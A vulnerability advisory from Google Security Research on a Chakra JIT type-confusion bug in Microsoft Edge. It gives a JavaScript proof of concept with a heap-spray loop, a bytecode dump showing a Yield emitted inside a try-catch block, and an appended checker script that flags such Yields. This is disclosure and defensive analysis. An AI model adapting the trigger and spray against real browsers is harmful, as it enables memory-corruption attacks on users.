Microsoft Edge Chakra JIT - Parameter Scope Parsing Type Confusion
Source: Google Security Research  Author: Google  Published: 2018-08-27
// PoC:
 
async function trigger(a = class b {
    [await 1]() {
    }
}) {
}
 
let spray = [];
for (let i = 0; i < 100000; i++) {
    spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234));
}
 
trigger();
 
/*
The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that.
 
Here's the generated bytecode.
 
Function trigger ( (#1.1), #2) (In0, In1) (size: 36 [34])
      18 locals (8 temps from R10), 5 inline cache
    Constant Table:
    ======== =====
     R1 LdRoot   
     R2 LdC_A_I4   int:1
     R3 Ld_A       (undefined)
     R4 LdFalse  
    
    Implicit Arg Ins:
    ======== === ===
     R5 ArgIn_A    In1
    
    0000   InitUndecl           R6
    0002   TryCatch             x:004c (  71)
 
 
  Line   1: a = class b {
  Col   24: ^
    0005   BrSrNeq_A            x:0048 (  62)  R5  R3
    000a   NewScFunc            R13 = b()
    000d   InitClass            R13
    0012   ProfiledLdFld        R14 = R13.prototype #0 <0>
    0016   SetHomeObj           R13  R14
    001b   NewScObjectSimple    R9
    001d   ProfiledStFld        R9.value = R2 #1 <1>
    0021   ProfiledStFld        R9.done = R4 #2 <2>
    0025   Yield                R9  R9   <<-----------------------------------------------
    0028   ResumeYield          R15  R9
    002b   NewScFunc            R16 = b.prototype[]()
    002e   SetComputedNameVar   R16  R15
    0033   ProfiledLdFld        R14 = R13.prototype #0 <0>
    0037   InitClassMemberComputedName R14[R15] = R16
    003d   SetHomeObj           R16  R14
    0042   InitConst            R6  R13
    0045   Ld_A                 R5  R13
    0048   Leave              
    0049   Br                   x:0074 (  40)
    004c   Catch                R10
    004e   Nop                
    004f   ProfiledLdRootFld    R11 = root.Promise #4 <4>
    0055   ProfiledLdMethodFld  R12 = R11.reject #3 <3>
    0059   StartCall            ArgCount: 2
    005c   ArgOut_A             Out0 = R11
    005f   ArgOut_A             Out1 = R10
    0062   ProfiledCallIWithICIndex R12 = R12(ArgCount: 2) <3>  <0>
    006c   Ld_A                 R0  R12
    006f   Leave              
    0070   Br                   x:0076 (   3)
    0073   Leave              
    0074   LdUndef              R0
 
 
  Line   5: }
  Col    1: ^
    0076   Ret             
 
Yield operations should not be performed under a try-catch block, but the incorrectly generated bytecode allows it at the Yield marked with the arrow above (offset 0025). This leads to a type confusion in the InterpreterStackFrame::OP_ResumeYield method.
*/
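The invariant the write-up relies on (no Yield may be emitted inside a TryCatch-protected region) can be checked mechanically over a Chakra bytecode listing in the format shown above. The following is an added example, not part of the Google Security Research advisory; the listing it scans is a constructed excerpt of the dump on this page, the TryCatch "x:HHHH" operand is treated as the catch-handler offset, and engineRejects() simply asks the JavaScript engine running the script whether it parses the PoC source as a SyntaxError, which a spec-compliant parser must.

```javascript
// Added example: flag Yield instructions that sit inside a TryCatch-protected
// region of a Chakra bytecode listing. SAMPLE_DUMP is a constructed excerpt
// of the dump on this page, trimmed to the instructions that matter.
const SAMPLE_DUMP = `
    0000   InitUndecl           R6
    0002   TryCatch             x:004c (  71)
    0025   Yield                R9  R9
    0028   ResumeYield          R15  R9
    0048   Leave
    004c   Catch                R10
    0076   Ret
`;

// Parse "OFFSET OPCODE OPERANDS" lines; headers and source echoes are skipped.
function parseListing(text) {
  const insns = [];
  for (const line of text.split("\n")) {
    const m = /^\s*([0-9a-f]{4})\s+([A-Za-z_]\w*)\s*(.*)$/.exec(line);
    if (m) insns.push({ offset: parseInt(m[1], 16), op: m[2], operands: m[3].trim() });
  }
  return insns;
}

// Assumption: a TryCatch's "x:HHHH" operand is the offset of its Catch handler,
// so the protected body is every instruction strictly between the two.
function findYieldsInTryCatch(text) {
  const insns = parseListing(text);
  const regions = insns
    .filter((i) => i.op === "TryCatch")
    .map((i) => {
      const m = /x:([0-9a-f]{4})/.exec(i.operands);
      return { start: i.offset, end: m ? parseInt(m[1], 16) : Infinity };
    });
  return insns
    .filter((i) => i.op === "Yield")
    .filter((y) => regions.some((r) => y.offset > r.start && y.offset < r.end))
    .map((y) => y.offset);
}

// Does the engine running this script reject the PoC source as an early error?
// A spec-compliant parser must; the advisory's point is that Chakra did not.
const POC_SRC = "async function trigger(a = class b { [await 1]() {} }) {}";
function engineRejects(src) {
  try { new Function(src); return false; } catch (e) { return e instanceof SyntaxError; }
}

console.log(findYieldsInTryCatch(SAMPLE_DUMP).map((o) => o.toString(16))); // [ '25' ]
console.log("engine rejects PoC source:", engineRejects(POC_SRC));
```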
 